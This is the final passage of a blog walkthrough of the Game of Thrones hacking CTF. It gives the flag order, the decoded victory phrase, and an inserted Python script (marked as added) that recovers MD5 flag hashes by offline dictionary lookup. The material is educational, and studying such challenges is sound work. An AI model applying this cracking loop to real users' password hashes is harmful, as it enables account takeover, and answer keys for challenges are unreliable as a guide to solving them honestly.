Contact: v1s1t0r.1s.h3r3@gmail.com
https://github.com/OscarAkaElvis/game-of-thrones-hacking-ctf

A last little present! you can get now all the flags ordered:

Dorne
Winterfell
Iron Islands
Stormlands
Mountain and the Vale
Reach
Rock and King's Landing
Savages
City of Braavos
Dragonglass Mine
Final Battle

Get the word of each one using https://crackstation.net or any other md5 online crack service to get a phrase in a row!!

Reordering the flags accordingly and looking up the MD5 hashes gives:

congratulations you pwned the seven kingdoms game of thrones ctf awesome
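The lookup does not need an online service. As an added example (not from the original post), the block below does the same offline: it hashes a candidate word list with MD5 and compares against the flags, which is all crackstation does for unsalted hashes, without handing the hashes to a third party. The flags are the ones quoted on this page; the candidates come from the decoded phrase above, so a lookup only succeeds where a flag really is the plain MD5 of that word.

```python
"""Added example: offline MD5 dictionary lookup of the CTF flags."""
import hashlib


def md5_hex(word):
    """Hex MD5 digest of a string."""
    return hashlib.md5(word.encode()).hexdigest()


def crack_md5(digests, candidates):
    """Return {digest: word} for every digest whose MD5 matches a candidate.
    A single pass over the candidates serves all digests at once."""
    wanted = {d.lower() for d in digests}
    found = {}
    for word in candidates:
        h = md5_hex(word)
        if h in wanted:
            found[h] = word
            if len(found) == len(wanted):
                break
    return found


# flags quoted in this part of the walkthrough (kingdom -> flag)
FLAGS = {
    "Reach": "aee750c2009723355e2ac57564f9c3db",
    "Rock and King's Landing": "c8d46d341bea4fd5bff866a65ff8aea9",
    "Savages": "8bf8854bebe108183caeb845c7676ae4",
    "City of Braavos": "3f82c41a70a8b0cfec9052252d9fd721",
    "Dragonglass Mine": "a8db1d82db78ed452ba0882fb9554fc9",
    "Final Battle": "8e63dcd86ef9574181a9b6184ed3dde5",
}

# candidate words from the decoded phrase, plus simple casing variants
PHRASE = "congratulations you pwned the seven kingdoms game of thrones ctf awesome"
CANDIDATES = [w for base in PHRASE.split()
              for w in (base, base.capitalize(), base.upper())]


def phrase_for(flags, candidates):
    """Map each kingdom to the recovered word, or None if it is not in the list."""
    hits = crack_md5(flags.values(), candidates)
    return {k: hits.get(v.lower()) for k, v in flags.items()}


if __name__ == "__main__":
    for kingdom, word in phrase_for(FLAGS, CANDIDATES).items():
        print(f"{kingdom:25s} {word}")
```

The same loop with a real wordlist (rockyou-sized) is the whole trick behind "md5 crack" websites: unsalted MD5 of a dictionary word is a lookup, not a cryptographic break.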

I hope you enjoyed this series. As always, you are very welcome to ask questions in the comments or simply leave a feedback for future walkthroughs.

Cheers and Happy Hacking!
